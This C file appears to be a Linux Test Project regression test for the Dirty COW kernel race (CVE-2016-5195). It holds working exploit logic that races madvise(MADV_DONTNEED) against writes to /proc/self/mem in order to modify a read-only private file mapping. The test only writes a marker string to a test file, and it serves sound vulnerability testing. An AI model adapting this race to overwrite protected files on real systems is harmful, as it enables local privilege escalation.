1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3  * Copyright (c) 2016 Cyril Hrubis <chrubis@suse.cz>
4  *  Based on: https://github.com/dirtycow/dirtycow.github.io
5  */
6 
7 #include <sys/mman.h>
8 #include <fcntl.h>
9 #include <pthread.h>
10 #include <unistd.h>
11 #include <sys/stat.h>
12 #include <string.h>
13 #include <stdlib.h>
14 #include <stdint.h>
15 #include <pwd.h>
16 
17 #include "tst_safe_pthread.h"
18 #define TST_NO_DEFAULT_MAIN
19 #include "tst_test.h"
20 
21 #define FNAME "test"
22 #define STR   "this is not a test\n"
23 
24 static char *str = "m00000000000000000";
25 static void *map;
26 static int mfd;
27 
28 /*
29  * You have to race madvise(MADV_DONTNEED) ::
30  * https://access.redhat.com/security/vulnerabilities/2706661
31  *
32  * This is achieved by racing the madvise(MADV_DONTNEED) system call while
33  * having the page of the executable mmapped in memory.
34  */
madvise_thread(void * arg)35 static void *madvise_thread(void *arg)
36 {
37 	int c = 0;
38 
39 	(void)arg;
40 
41 	while (1)
42 		c += madvise(map, 100, MADV_DONTNEED);
43 
44 	tst_res(TINFO, "madvise: %i", c);
45 
46 	return NULL;
47 }
48 
49 /*
50  * You have to write to /proc/self/mem ::
51  * https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
52  *
53  * The in the wild exploit we are aware of doesn't work on Red Hat Enterprise
54  * Linux 5 and 6 out of the box because on one side of the race it writes to
55  * /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise
56  * Linux 5 and 6.
57  */
proc_self_mem_thread(void * arg)58 void *proc_self_mem_thread(void *arg)
59 {
60 	int c = 0;
61 
62 	(void)arg;
63 
64 	while (1) {
65 		lseek(mfd, (uintptr_t) map, SEEK_SET);
66 		c += write(mfd, str, strlen(str));
67 	}
68 
69 	tst_res(TINFO, "write: %i", c);
70 
71 	return NULL;
72 }
73 
sighandler(int sig)74 void sighandler(int sig)
75 {
76 	(void) sig;
77 
78 	_exit(0);
79 }
80 
81 /*
82  * You have to use MAP_PRIVATE for copy-on-write mapping.
83  * Create a private copy-on-write mapping. Updates to the
84  * mapping are not visible to other processes mapping the same
85  * file, and are not carried through to the underlying file. It
86  * is unspecified whether changes made to the file after the
87  * mmap() call are visible in the mapped region.
88  */
main(void)89 int main(void)
90 {
91 	pthread_t pth1, pth2;
92 	int fd;
93 	struct stat st;
94 
95 	tst_reinit();
96 
97 	SAFE_SIGNAL(SIGUSR1, sighandler);
98 	TST_CHECKPOINT_WAKE(0);
99 
100 	/* Open it read only and map */
101 	fd = SAFE_OPEN(FNAME, O_RDONLY);
102 	SAFE_FSTAT(fd, &st);
103 
104 	map = SAFE_MMAP(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
105 	mfd = SAFE_OPEN("/proc/self/mem", O_RDWR);
106 
107 	/* Try to rewrite it */
108 	SAFE_PTHREAD_CREATE(&pth1, NULL, madvise_thread, NULL);
109 	SAFE_PTHREAD_CREATE(&pth2, NULL, proc_self_mem_thread, NULL);
110 
111 	pause();
112 
113 	return 0;
114 }
115